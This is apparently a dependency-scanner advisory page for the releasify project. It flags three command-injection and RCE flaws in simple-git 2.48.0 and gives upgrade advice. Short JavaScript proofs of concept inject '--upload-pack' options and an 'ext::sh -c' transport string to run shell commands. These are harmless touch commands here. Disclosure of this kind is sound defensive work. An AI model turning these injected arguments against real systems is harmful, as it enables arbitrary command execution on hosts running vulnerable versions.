Vulnerabilities

3 via 3 paths

Dependencies

130

Source

GitHub

Commit

f8a4e7f4

Find, fix and prevent vulnerabilities in your code.

Severity
  • 3
Status
  • 3
  • 0
  • 0

high severity

Command Injection

  • Vulnerable module: simple-git
  • Introduced through: simple-git@2.48.0

Detailed paths

  • Introduced through: releasify@fastify/releasify#f8a4e7f430c6b5cfca533e1dcc673f6e6a647915 simple-git@2.48.0
    Remediation: Upgrade to simple-git@3.3.0.

Overview

simple-git is a light weight interface for running git commands in any node.js application.

Affected versions of this package are vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn) function, both the remote and branch parameters are passed to the git fetch subcommand. By injecting some git options it was possible to get arbitrary command execution.

PoC

// npm i simple-git
const simpleGit = require('simple-git');
const git = simpleGit();

let callback = () => {};

git.init(); // or git init

let origin1 = 'origin';
let ref1 = "--upload-pack=touch ./HELLO1;";
git.fetch(origin1, ref1,  callback); // git [ 'fetch', 'origin', '--upload-pack=touch ./HELLO1;' ]

let origin2 = "--upload-pack=touch ./HELLO2;";
let ref2 = "foo";
git.fetch(origin2, ref2,  callback); // git [ 'fetch', '--upload-pack=touch ./HELLO2;', 'foo' ]


let origin3 = 'origin';
let ref3 = "--upload-pack=touch ./HELLO3;";
git.fetch(origin3, ref3, { '--depth': '2' }, callback); // git [ 'fetch', '--depth=2', 'origin', '--upload-pack=touch ./HELLO3;' ]

// ls -la

Remediation

Upgrade simple-git to version 3.3.0 or higher.

References

high severity

Command Injection

  • Vulnerable module: simple-git
  • Introduced through: simple-git@2.48.0

Detailed paths

  • Introduced through: releasify@fastify/releasify#f8a4e7f430c6b5cfca533e1dcc673f6e6a647915 simple-git@2.48.0
    Remediation: Upgrade to simple-git@3.5.0.

Overview

simple-git is a light weight interface for running git commands in any node.js application.

Affected versions of this package are vulnerable to Command Injection due to an incomplete fix of CVE-2022-24433 which only patches against the git fetch attack vector. A similar use of the --upload-pack feature of git is also supported for git clone, which the prior fix didn't cover.

PoC

const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('file:///tmp/zero123', '/tmp/example-new-repo', ['--upload-pack=touch /tmp/pwn']);

Remediation

Upgrade simple-git to version 3.5.0 or higher.

References

high severity
new

Remote Code Execution (RCE)

  • Vulnerable module: simple-git
  • Introduced through: simple-git@2.48.0

Detailed paths

  • Introduced through: releasify@fastify/releasify#f8a4e7f430c6b5cfca533e1dcc673f6e6a647915 simple-git@2.48.0
    Remediation: Upgrade to simple-git@3.15.0.

Overview

simple-git is a light weight interface for running git commands in any node.js application.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when enabling the ext transport protocol, which makes it exploitable via clone() method. This vulnerability exists due to an incomplete fix of CVE-2022-24066.

PoC

const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('ext::sh -c touch% /tmp/pwn% >&2', '/tmp/example-new-repo', ["-c", "protocol.ext.allow=always"]);

Remediation

Upgrade simple-git to version 3.15.0 or higher.

References